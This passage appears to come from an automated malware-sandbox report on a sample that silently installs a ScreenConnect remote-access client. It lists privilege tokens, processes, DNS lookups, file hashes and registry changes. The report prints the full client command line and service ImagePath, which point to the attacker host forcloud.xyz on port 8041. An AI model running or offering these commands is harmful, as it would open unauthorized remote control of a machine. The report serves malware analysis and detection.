| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe
"C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3B3FA75DA6090FA1D6B10FDD8DC4666D C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240633250 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C50216D1B5C8D9063CE30DF11C96E2E2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E8B38A38F3824AA6F607D57AD88FD9CE E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c="
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "14beaf0b-de62-47f8-a1ec-9c03318254ed" "User"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | forcloud.xyz | udp |
Files
memory/2944-0-0x0000000074F0E000-0x0000000074F0F000-memory.dmp
memory/2944-1-0x00000000031C0000-0x00000000031C8000-memory.dmp
memory/2944-2-0x0000000005AC0000-0x0000000005DB4000-memory.dmp
memory/2944-3-0x00000000056F0000-0x000000000577C000-memory.dmp
memory/2944-4-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-5-0x0000000005790000-0x00000000057B2000-memory.dmp
memory/2944-6-0x00000000057C0000-0x000000000596A000-memory.dmp
memory/2944-7-0x0000000006370000-0x0000000006914000-memory.dmp
memory/2944-8-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-9-0x0000000074F00000-0x00000000756B0000-memory.dmp
memory/2944-14-0x0000000074F00000-0x00000000756B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi
| MD5 | 6ebb0b130daf468e91c095bf931388cb |
| SHA1 | c503cd29966246a33d6b8196c4788e4d83dffa09 |
| SHA256 | 824fd5fc45bc205cc73a9545c396bfaebaa5460d93eeac2aff049bc11c2036f0 |
| SHA512 | e8d2153f8709f22f28fdb8b6867c2f3c7f6abc4180a44cd35eeb277ef09f181ab0a08c53de309aa641498d6208a20bd0d842c0bedead22d4df9ae4f95ff6bdc0 |
memory/2944-12-0x0000000074F00000-0x00000000756B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp
| MD5 | 845b0569d54305e62c6e8ffe198d217c |
| SHA1 | cd06c3d1554fe08099ada4f4448a23a6422e6234 |
| SHA256 | 4da6c507c746cd07ca4546e723d0d145bbf4d26ff8de13f1a0750ef323a89a2e |
| SHA512 | af45bb8199f2af323b9954da0d11eed51459708608d356bc40bd9d9189c02c2c902f533077724dd7c6a7068e564b5c8f621ef1032098cef26ed26d5bf26e23fe |
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\Microsoft.Deployment.WindowsInstaller.dll
| MD5 | 5ef88919012e4a3d8a1e2955dc8c8d81 |
| SHA1 | c0cfb830b8f1d990e3836e0bcc786e7972c9ed62 |
| SHA256 | 3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d |
| SHA512 | 4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684 |
memory/1740-42-0x0000000004E80000-0x0000000004EAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.InstallerActions.dll
| MD5 | 9260afe4bbde2549fc0b92f657c2e50a |
| SHA1 | 5580778a62b06d7b56d3f788727514551de31647 |
| SHA256 | 588d3a5e1b91d3756f74ea61c9c1b5f7871af924fab469cebb579f8aeb2fc135 |
| SHA512 | afce644ee04813e1e323b719e8ad3cfefe6e20ad0aa821f1325b8e0ae0144a7cff4e0f1f4b6f45df33f060392f94bcfd88d62b2218fd0bc573d65a20d80e968b |
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Core.dll
| MD5 | 3b1ba4bebefdc8a95b0f2f0b4e50c527 |
| SHA1 | 15551d2e8bfb829f3a96d161b43de820c0d417ce |
| SHA256 | a843b3a4549c43ef5bd8470cacf5d2f0f3b3c8110441fcc10079facc7db3de29 |
| SHA512 | f41595586cd5330537f5f02b392310b028e36f618e2583d125430ecd103ebbf6d2cf6befcfb1b32279eeb9fd7ef018f49131e3906fb61bc324da85d93a9a18c7 |
memory/1740-50-0x0000000004F60000-0x0000000004FEC000-memory.dmp
memory/1740-46-0x0000000004EC0000-0x0000000004ECC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIC563.tmp-\ScreenConnect.Windows.dll
| MD5 | d196174cf03f86c8776e717f07d5d19f |
| SHA1 | bbd2c6a59229b3e4ec7c5742248f3f55a61dd216 |
| SHA256 | a1edd67a131505cc84d76601474c53874a56b5437b835838e4a866e20f6cd264 |
| SHA512 | cf4d159bcb42a1a7ea03f8877736cace109ae79998906b9178c74f7a9b63030cddc2bc94ef6c5f718e99c2d0039cf3589f8c4f2bf5b67db94b3b96d2c988b45b |
memory/1740-54-0x00000000051A0000-0x000000000534A000-memory.dmp
C:\Windows\Installer\MSIFD1E.tmp
| MD5 | ba84dd4e0c1408828ccc1de09f585eda |
| SHA1 | e8e10065d479f8f591b9885ea8487bc673301298 |
| SHA256 | 3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852 |
| SHA512 | 7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290 |
\??\Volume{f0eec59f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{291c9575-6640-4619-ba6c-8ec19e9d8a84}_OnDiskSnapshotProp
| MD5 | 6c3b76d02689c675d382e84056fa8e44 |
| SHA1 | 13e56afc104e3b727cc8a8783aa1937898807480 |
| SHA256 | 069a40b27b68d6a6458742f1faa61688bf464126ebfd28d95a9c263723d3b9d4 |
| SHA512 | 68428e9ce1e52449fa3fe50f6a3baf02dedb94f9c20d51091cd5b50252ea425508a187e66043134c6c114b4c5e23edd4ee2c614d2595609beab40651949b22c7 |
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
| MD5 | b887328d115c752911f6e990fba7b6f5 |
| SHA1 | 8e1e3444a3f30085409d261732d11407bfa93bb3 |
| SHA256 | 93ea2a8758fcff1dab55ed1b96dbf82764e40e8e2b2d67788c640a227ae1fe94 |
| SHA512 | f7a86a21d3f86bdb638d92652af24f30a9d36d8d4c34e0df096e4ac4cdf8b63aa40cec714ee4bbed9f4e0fee405da8ae43d2f52db4bb4c3e06c9a53fca6ad06d |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
| MD5 | 826314610d9e854477b08666330940b5 |
| SHA1 | 65b601d60042cf6f263cd38ac2f63cd06a9de159 |
| SHA256 | e54963cb63c9e471e2d3d59e55e4c7aeedccafdd616b99c4b3af230608e4bcc9 |
| SHA512 | 5c01d6de25d60eb6b1eb72b7fa6401b71153c2a740c41aeeb2bd302cc4e80f5c1a388b647ee16da196705ac8edbc60abda49b9a531517bb85959cc018fb5d1fb |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll
| MD5 | 3ff07c657068430ef677181d1f67066d |
| SHA1 | 37f7e9d2ccb65b4ea2733393015635ea1b43393e |
| SHA256 | d17cf13612039f6a4ca17b56c32399ccbe279a499c8d2f8e910b1fd6f4fff2b1 |
| SHA512 | 5552208b5649ceac2b32510ea12d409a85643d27e6a9c335e049195a507ae9211aee77574376fde059747998b60ae041e191635a67c3461585aba7f9b877b095 |
memory/4636-120-0x00000000017E0000-0x00000000017F8000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config
| MD5 | 095c85acc658f0733bc6941163ec234c |
| SHA1 | 298c53608e02cac620702cb6abe75c70560c03b1 |
| SHA256 | 8e3dc9d06b282a536e1af7806d7f434d5738d4932dae557ccd762bfeed0bfc11 |
| SHA512 | fe3fbe2bcd2baabcf192663dd7603cce1db1025a9d40ad98598d5441d892efc0c94aa41fe61256762538e0ed3bcc3e7958cdbf87c2d577ee3bdd561597635d03 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config
| MD5 | f7f74a2053a7c858ed989f07f81b9720 |
| SHA1 | dc585c95c643e7a6b3cbb63a080e660ffebbc7b9 |
| SHA256 | fe4d54400c7fae8710be0b9040d18e78bdde3a53953629275ce40ebdcd05d7b2 |
| SHA512 | fefcef4f03b7c52346bc789f95968f26adb889a6a891eb6d782afe9c38d2571d8c703d0ad4382304a208cb44132fcfc4cdec4b5259cae6d0ba560b0ac4480043 |
memory/4636-131-0x0000000003FA0000-0x0000000003FF0000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll
| MD5 | f311a8217807f6c85817058522e234a2 |
| SHA1 | ceb586b3cf7b0ee86ea8242d9b3d8641c9444cd1 |
| SHA256 | 032450cd037d9e0eec49e0b4ff44073d539775633fb4af6fd76d4cb19116aac9 |
| SHA512 | 5ef1f6b595af9cc7f788680ac3f3e9b8b12baafe734a8e2f675baa57f5ef2c69806492911bda54f11c5a4b8cf3cced82cfc6e0ecf214e45083e9f9aa6a83d039 |
memory/4636-135-0x0000000003FF0000-0x0000000004026000-memory.dmp
memory/4636-136-0x00000000042B0000-0x0000000004342000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll
| MD5 | 5adcb5ae1a1690be69fd22bdf3c2db60 |
| SHA1 | 09a802b06a4387b0f13bf2cda84f53ca5bdc3785 |
| SHA256 | a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5 |
| SHA512 | 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73 |
memory/4636-138-0x0000000004210000-0x0000000004251000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll
| MD5 | be74ab7a848a2450a06de33d3026f59e |
| SHA1 | 21568dcb44df019f9faf049d6676a829323c601e |
| SHA256 | 7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d |
| SHA512 | 2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc |
memory/4636-140-0x0000000004490000-0x0000000004562000-memory.dmp
C:\Config.Msi\e57fbb6.rbs
| MD5 | 6d4e03c4e249f0a09b6aa7f4141a7ae5 |
| SHA1 | 7690405857a223e93b04ade1772ef67b98ae2023 |
| SHA256 | ebb09f4dd5bd12386d89c3953cb1b2523e27a3a90ff893d983b3fd3dd24dfa9e |
| SHA512 | 258879157eb40695006f5192074db8843b6eddf767f0da07a1ebc1388d0d48084ed7b200968b4c2467d09939a7b7831f19c2cda722cf1ffcee733cc05c4c96a3 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources
| MD5 | 511202ed0ba32d7f09eab394c917d067 |
| SHA1 | dbd611720fd1730198f72dec09e8e23e6d6488f8 |
| SHA256 | f8398a235b29af6569f2b116e0299b95512d042f5a4cd38c98c79729a5fbdb9d |
| SHA512 | f04b08938f3ebf8cfa1a1157a94da3ae4699494bdce566619afa5b13a8f6ebe556d522c064e5ea02e343b59a489343f77e3ea2bb2ea390aae35a626f41cadc77 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources
| MD5 | 5cd580b22da0c33ec6730b10a6c74932 |
| SHA1 | 0b6bded7936178d80841b289769c6ff0c8eead2d |
| SHA256 | de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c |
| SHA512 | c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
| MD5 | ab5fa8d90645878d587f386d0e276c02 |
| SHA1 | a602a20735a1104851f293965f1fe4ab678bf627 |
| SHA256 | 316bbf433f1f803d113adf060c528ccc636656cee26b90f5fea011c1c73c7d16 |
| SHA512 | a181e23c8fa01bc1d9f0f9f95a5ca6112e2b61f34f4c1da696d3ccabbbd942bcc81a3f4a60921328a6020d28aed8711c22be33761cb685921d50fea8b1d7b986 |
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config
| MD5 | 728175e20ffbceb46760bb5e1112f38b |
| SHA1 | 2421add1f3c9c5ed9c80b339881d08ab10b340e3 |
| SHA256 | 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077 |
| SHA512 | fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7 |
memory/608-161-0x0000000000440000-0x00000000004D6000-memory.dmp
memory/608-162-0x0000000002580000-0x00000000025B6000-memory.dmp
memory/608-164-0x000000001B5D0000-0x000000001B77A000-memory.dmp
memory/608-163-0x000000001B390000-0x000000001B41C000-memory.dmp
memory/608-165-0x000000001C830000-0x000000001C9B6000-memory.dmp
memory/608-167-0x00000000025E0000-0x00000000025F8000-memory.dmp
memory/608-166-0x0000000002540000-0x0000000002558000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 17:06
Reported
2024-11-13 17:09
Platform
win7-20241010-en
Max time kernel
140s
Max time network
144s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=eef8a2dd-7cdd-4d96-ac88-046f110ebda2&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAypwQqMSE80C7%2b83r5rB%2b5gAAAAACAAAAAAAQZgAAAAEAACAAAABz4llyKSKGXC4YC%2fhQUax1llOlyRp%2blcVdz46qHXpeLwAAAAAOgAAAAAIAACAAAADNXL9uItJ%2bMAk6l%2fxXe%2bbp8Dr94qV2kbvt3ErotkWmpaAEAABinbUxWPE81CWNx51hgVbSFx%2bNrzPyEJmsZrZF%2ftli5MW6BU%2frvmpwxl2uM%2bMgDHk4R%2fJHPjbi9mUig%2f4kuZkPMKFGJ9eUhzIk7MX5jipaJQ05HvQoVTtZy09%2bpdaKFmSsaC6lwqu1kottT5spMqUmannrWG%2ff8qpTwakvtmn3Aobppjyfk%2ba5Vk69WYb3727Tov%2fd0AqAl9E5%2bsYUW%2f74lNMtl8Am9G%2famNccxEGDGBo%2b8Vfu1G8YowJUYTypMxSV%2bEYAq%2b147T%2bMvyn6b106LSTLHBw7T%2bH7KQPwm35iiDN80HJWgJ8nxqoLSyJ2Tt34btAkUncyO27uHIEcB4r%2bejxY924y7VGSxavYq0F8XQjaX7hnigWYHLgKsR714w6Wy%2b0uoeKjAIGMA0Y28RN4Sdyr9v%2fklSOat9v3lV8gmcuLaEvbEj68cTEBd2gbcZlNjlBJP6xdXzDuLcwcdTTBfMOoniDaqEnYv0fefGtNtpWDIhHzqA0efBH9tVtrb3Q1lykXhj0aezk4rMRxdrOuiK6kFKOzpE4HHb3p7bpUWIcX2SpRfLzS1vWIQDZ0Pr2QVeZqEcuwBULecurFDnoyJIJBAwJ3YFJKuy45lKQ4t3GiW9gQ%2bz2FV5LJpPKo5u%2fgOatFzL8XEa2dlhjNctVMTnVZst%2bo%2fS3bldTtXW1JflxRUcktD1UBESTNnYzy19gf4vDBsQU730UPrMtPmz5MgOs6H%2b4AHoMhciX7V2FqBv5IAS7P0rOYbywh4j9KGRPKOHDpPmSF%2fnrBiDHIcZ6VMONcTbjCUvfsM1t7jUgpzSyqrDJR%2b%2bXNueg2Z2z%2frRtlehaM3VKEVWF9%2bxtkiCjR4SpYucyj8tT%2bV5S0%2bpxjMYBgtRa191RcjfydxZjR9ei6z2Rdx3qOoJnJFNVw8HKPneCYY1yX7IPu1orSR%2fSJg1VB3nsiLonSSTyKBbCFniY%2f2h%2brZTFVGn7TSLWhRJ4ncHvhdZB%2bZy8SkB29MpoduZ9B4El1%2fR5CPBQ5wIvbEcHhFeDRbvYwes1YjsPuxq8s5clcoK%2bG9ExleDI6gBc%2fAMj2orTyuIgaH8KTxi19x8DuhGpVf0BCFQPnsSGMhxsRIKjI835wR4AEY8i9vFX8MPeTuvUbPJQnnOJLXgA12bErawhrXUoZEUNqxMb4XZcy3lnVV5hzgoxouPD4BqOM%2bAB7avFqDx3bX82aHFeGFshhi9W5d1Qc9%2bADDK3VVWdMUAsuSyXeHYoUxHE2ZEyEcRvEsFd1nfNlbSCsJzPDM69L2z4siDSV2rxHGWeXSePLOOY7AekjTtYwNiy1073ySHDUX7WFnNdoW5ZYxkdPuGLhycYFVLFI8VFWUDk07Bc1eE%2bQhxy4TuN%2fbnugM6o4LIfka0VvpQJm9KnmTsVCk3FdgUrw1u%2fkkxYaj1bO6hgWpPvbHcj46vYecRZ%2f%2f7iPOVxaZrgEVBiOy3fMXP8st%2bc9ivOYICQmZ%2fQfF9e4GJJHBeWdCTLdYP%2bTS4uuxahNmuodMJuKvdw5o0m3587TBqVWyc6ANM30ztAPUY65dWo1v%2bFeWHbMcTBBxba5f2zUEUAAAAB2xS%2bAWDmhx2Ub14bMtVlP0cpw4z6xVig5oA4Brp71WnuLW%2fNaACTv0dPP5IyJF32BoNa6HhQjLWq4VH7sXzEB&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
